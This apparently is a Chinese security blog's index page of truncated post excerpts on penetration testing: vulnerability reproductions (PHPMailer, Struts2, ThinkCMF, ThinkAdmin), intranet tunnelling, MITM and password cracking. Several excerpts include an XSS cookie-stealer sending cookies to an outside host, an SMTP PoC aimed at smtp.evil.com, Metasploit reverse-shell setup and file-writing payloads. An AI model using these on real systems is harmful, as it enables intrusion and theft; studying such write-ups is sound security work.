- 博客(95)
- 资源 (2)
- 收藏
- 关注
原创 内网渗透技术
内网穿透技术原理netshiptablesregerogEarthwormicmptunneldns2tcpc端口复用原理内网穿透技术原理:通过拿到shell的主机,要去访问内网的其他主机时候,通过监听本地端口,靶机转发目标内网主机到本地监听端口上。另一种是访问本地端口(内网主机),通过映射的方式。如下图,kali通过vpn开启的8081去访问win10的3306服务。vpn先是开启监听,通过...
2020-04-30 15:20:03 2380 3
原创 基于Linux下的root提权骚操作
0x00_前言小小博客,大大梦想。博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户提权到root下的操作,如有错误或其他请多多包含,希望提出多交流。0x01_操作简介提权的三个骚操作:内核溢出明文密文解密计划任何进程密码复用加粗样式...
2020-01-30 14:51:24 5645 1
原创 Centos7下安装ipython和jupyter的详细教程
Centos7下安装ipython和jupyter的详细教程Centos7下安装ipython和jupyter的详细教程1.配置静态网络:vim /etc/sysconfig/network-scripts/ifcfg-ens33添加GATEWAY、IPADDR、NETMASK,把BOOTPROTO的dhcp改成static2.如果要配置dns解析,则需要查看此文档/etc/resolv...
2020-01-13 18:07:29 2103 2
原创 教你如何实现中间人攻击
使用MITMF + MSF +BEEF + CVE-2018-8570实现内网渗透安装MITMF:目前2019.1a以上的版本kali已经没有携带mitmf,需自行安装,但目前的安装方法已经失效,而我众和多种方案,查阅相关资料,成功安装,以下是我的安装方法。a)先安装解决所需要的包依赖apt install python-dev python-setuptools libpcap0.8-de...
2019-11-27 21:16:09 3314
原创 Burp Suite如何爆破登陆页面密码
一、实验环境以及工具1.已经授权的网站(未经授权非法测试都是违法行为,请大家不用尝试,本章纯属技术分享)2.Burp Suite3.设置代理二、实验步骤1.先设置代理模块。设置代理模块比较简单,大家可以根据自己的浏览器工具不同去自行百度。我用的是谷歌,方法如下输入代理,点击下方代理设置先点击局域网设置,然后勾选为LAN使用代理服务器,地址填写127.0.0.1,端口8080,点击...
2019-08-04 15:43:40 6338 3
原创 python2和3的pip2、pip3在kali上安装
0x01 pip(python2)安装:wget https://bootstrap.pypa.io/2.6/get-pip.pypython2 get-pip.pypip -V0x02 pip3(python3)安装wget https://bootstrap.pypa.io/get-pip.pypython3 get-pip.pypip3 -V
2020-12-02 10:29:28 1289
原创 PHPMailer 任意文件读取漏洞
CVE-2017-5223POC<?php # Author:Yxlinkrequire_once('PHPMailerAutoload.php');$mail = new PHPMailer();$mail->IsSMTP();$mail->Host = "smtp.evil.com";$mail->Port = 25;$mail->SMTPAuth = true; $mail->CharSet = "UTF-8";$mail->E
2020-11-20 10:06:20 468
原创 关于python3对excle处理笔记1
实现功能1:比较1.txt和2.txt中的内容,如果1.txt中的内容有2.txt的内容,则写入某某某。from openpyxl import load_workbookimport openpyxldef loadDatadet(infile): f=open(infile,'r') sourceInLine=f.readlines() dataset=[] for line in sourceInLine: temp1=line.strip('
2020-11-14 13:41:52 150
原创 Struts2 S2-059漏洞复现-命令执行
Struts2 S2-059漏洞复现-命令执行http://192.168.202.133:8080/?id=1把id=改成%25%7B233*233%7D验证完毕测试命令执行
2020-11-03 11:05:48 2693 1
原创 Struts2-046漏洞复现
漏洞存在位置:1、Content-Length:的长度大于2g2、filename=这个参数poc为"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"利用:exp:sh exploit-cd.sh http://192.168.202.133:8080/ ifconfig...
2020-11-02 19:04:28 1284 1
原创 github下载项目进行编译(解决)
先安装好maven和jdkjdk安装参考:https://www.runoob.com/java/java-environment-setup.htmlmaven安装参考:https://www.cnblogs.com/sunleejon/p/12391093.html安装完后,要找到目录下有poc.xml的文件下进行编译,不然会爆这样的错误:编译命令mvn package报错二:如果出现“编码GBK的不可映射字符”的报错在pom.xml下的<build><p
2020-11-02 11:33:30 2820
原创 安全资料,限时领取!
#安全资料网络安全攻防vip,限时保存!链接:https://pan.baidu.com/s/1NwtAyax0cTQwgh_RM6Z23g提取码:rgic
2020-10-28 21:05:20 594
原创 ThinkCMF框架任意内容包含漏洞-实战
漏洞影响版本:ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.31、phpinfo版payload如下:?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<
2020-10-12 19:35:28 541
原创 RDP中间人攻击
前言:靠着网上的资源一点一点的啃。内网渗透中,发觉有机器开了远程桌面,可以使用RDP中间人攻击进行持久控制和横向渗透。攻击成功具备的条件同一个网段知道连接者ip,被连接ip。工具:Sethgit clone https://github.com/SySS-Research/Seth.git使用方法./seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [&
2020-10-04 12:46:18 929 1
原创 Thinkadmin v6爆高危漏洞!
Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)漏洞验证先使用了burp,发现回不来POST /admin.html?s=admin/api.Update/node HTTP/1.1Host: xxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0Accept: text/html,application/xhtml+xml,appli
2020-09-30 10:53:39 2548
原创 WordPress File Manager < 6.9 RCE(CVE-2020-25213)漏洞复现
影响版本:WordPress File Manager < 6.9最开始被坑,找了这个下载链接,卡还下载不了。https://plugins.svn.wordpress.org/wp-file-manager/tags/5.9/后来发现官网有提供下载链接https://wordpress.org/plugins/wp-file-manager/advanced/由于没有wordpress,也是从零开始。安装多次终于成功访问http://192.168.202.134/wordp
2020-09-28 22:40:09 1729
原创 shadow的密码与破解
数字和所使用的加密算法对应关系:格式 算法$1 md5$2a blowfish$2y blowfish$5 sha-256$6 sha-512json shdownjson --show shdown
2020-09-20 15:55:03 4664
原创 模拟XSS平台
获取cookie,发生到指定服务器<script>var cook=document.cookie;var img=document.createElement("img");img.src='http://www.xss.com/xss.php?'%2bcook;document.body.appendChild(img);</script>效果接受cookie<?phpfile_put_contents("cookie.txt",json_encod
2020-09-14 16:22:29 412
原创 PHP代码审计-部分函数_2.0
过滤XSS的函数:htmlspecialchars()简单写个XSS效果加上函数之后是这样的结果原因是进行了HTML字符实体转码绕过如果有url两次解码情况,可以使用双重编码绕过%253cscript%253ealert(document.cookie)%253c/script%253e对’ " \的转义addslashes()对于sql注入的,就想到宽字节注入如果是XSS的<input onfocus=alert(/xss/) autofocus>
2020-09-14 11:10:58 155
原创 python的字典生成工具
前言:命运,依旧在自己手中!安装pydictorgit clone https://github.com/LandGrey/pydictor常用使用命令,社工学--sedb其中option的对应解释set ename Lbbrun结果合并去重python pydictor.py -tool uniqbiner 合并去重的文件目录多字典文件组合python pydictor.py -tool hybrider 1.txt 3.txt...
2020-09-12 23:36:49 618
原创 PHP的代码审计-XCTF-Web2-详细解说
前言:我把梦撕了一夜XCTF的Web2,这是源代码<?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr
2020-09-04 21:42:29 370
原创 墨者21道
1.1.1.uWSGI 漏洞复现(CVE-2018-7490)测试详情 查找CVE-2018-7490漏洞,此漏洞构造…%2f可以访问任意文件,目录遍历,在key.txt前面多添加/…%2f…%2f…%2f…%2就可以得到key1.1.2.Webmin未经身份验证的远程代码执行测试详情 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。受影响的版本:Webmin<=1.920抓包 修改包第一步,修改
2020-08-28 15:16:13 950
原创 shiro反序列化漏洞环境搭建
kali下shiro反序列化漏洞环境搭建git clone https://github.com/apache/shiro.gitgit checkout shiro-root-1.2.4 #进入shirocd samples/web安装mvn工具sudo apt-get install openjdk-8-jdksudo mkdir -p /usr/local/apache-mavenwget http://ftp.wayne.edu/apache/maven/maven-3/3.3.9/
2020-05-09 17:01:41 2668
原创 python3_队列结构作业
编写程序,实现自定义类,模拟队列结构。要求实现入队、出队以及修改队列大小和判断队列是否为空、是否为满的功能,同时要求在入队时如果队列已满则退出、出队时如果队列已空则等待指定功能。class duilie: def __init__(self, size=5): self._content = [] self._size = size sel...
2020-05-06 10:47:40 3875 4
原创 msf作为控制端使用
命令执行上,去拿shelluse exploit/multi/script/web_deliveryshow optionsset target 1set payload php/meterpreter/reverse_tcpset lhost 192.168.232.136run执行此代码php -d allow_url_fopen=true -r "eval(file_...
2020-05-02 18:26:10 210
原创 netsh端口转发
如没有ipv6netsh interface ipv6 install开启防火墙入站规则netsh interface portproxy add v4tov4 listenaddress=192.168.1.1 listenport=4444 connectaddress=192.168.1.2 connectport=6666或者netsh interface portprox...
2020-04-26 12:57:06 787
原创 lcx的使用-内网穿透
lcx有两个功能映射(slave)和转发(tran)简单看个列子:映射(slave)第一步:我在攻击机上执行此命令lcx -listen 3333 2222此命令表示我监听3333端口,并把3333端口映射到2222端口第二步:我在靶机上执行此命令:lcx -slave 172.168.172.133 3333 172.168.172.201 3389此命令表示我使用sl...
2020-04-24 14:04:03 4361 2
原创 Cookie与Session的应用
简介:使用PHP代码介绍网页上Cookie和Session的使用介绍:cookie必须依靠session来实现cookie的设置<?php setcookie('admin',"www.admin.com");?><?php var_dump($_COOKIE);?>cookie的销毁<?php setcookie("admin","",t...
2020-04-23 21:05:18 197
原创 python3 尼姆游戏
python3尼姆游戏是个著名的游戏,有很多变种玩法。两个玩家轮流从一堆物品中拿走一部分。在第一步中,玩家可以自由选择拿走多少物品,但是必须至少拿走一个并且最多只能拿走一半物品,然后轮到下一个玩家。拿走最后一个物品的玩家输掉游戏。在聪明模式中,计算机每次拿走足够多的物品使得堆的大小是2的幂次方减1–也就是3,7,15,31或63。除了堆的大小已经是2的幂次方减1,在其它情况下这样走都是符合游戏...
2020-04-22 08:34:25 6276 1
原创 内网渗透之SSH隧道
1.本地转发ssh -CfNg -L 1153:172.168.172.147:3389 root@172.168.172.146netstat -tulnp | grep "1153"rdesktop 127.0.0.1:11532.远程转发ssh -CfNg -R 3308:172.168.172.147:3389 root@172.168.172.143nets...
2020-04-18 01:47:34 676
原创 Collatz 序列的编写
以下代码是python3.8def collatz(number): if number % 2 == 0: a = number // 2 print(a) return a else: b = number * 3 + 1 print(b) return bzs = int(...
2020-04-17 17:22:48 344
原创 记一次使用burp挖掘ssrf的src过程
将存在可疑的链接的包通过burp抓下应为没有写链接,发现跳转404使用burp生成poc,复制此地址输入构造好的payload,成功跳转到burp的页面危害:可以进行钓鱼,访问恶意网站等...
2020-04-16 11:59:37 926 3
原创 CSRF跨站请求伪造实战
先是用目录扫描一顿扫,发现一个文件打开看到是源码,里面还有修改密码的网页并且发现没有限制referer和token立马使用CSRF提交通过上面找到的后台路经尝试登陆来到后台...
2020-04-14 14:37:35 194
原创 python3编写随机验证码不区分大小写
import random,stringdef main(): passwd="" num=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H','I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q','R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', ...
2020-04-09 13:38:32 1982
metasploit使用手册.xmind
2020-10-16
网络安全思维导图.rar
2020-02-21
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人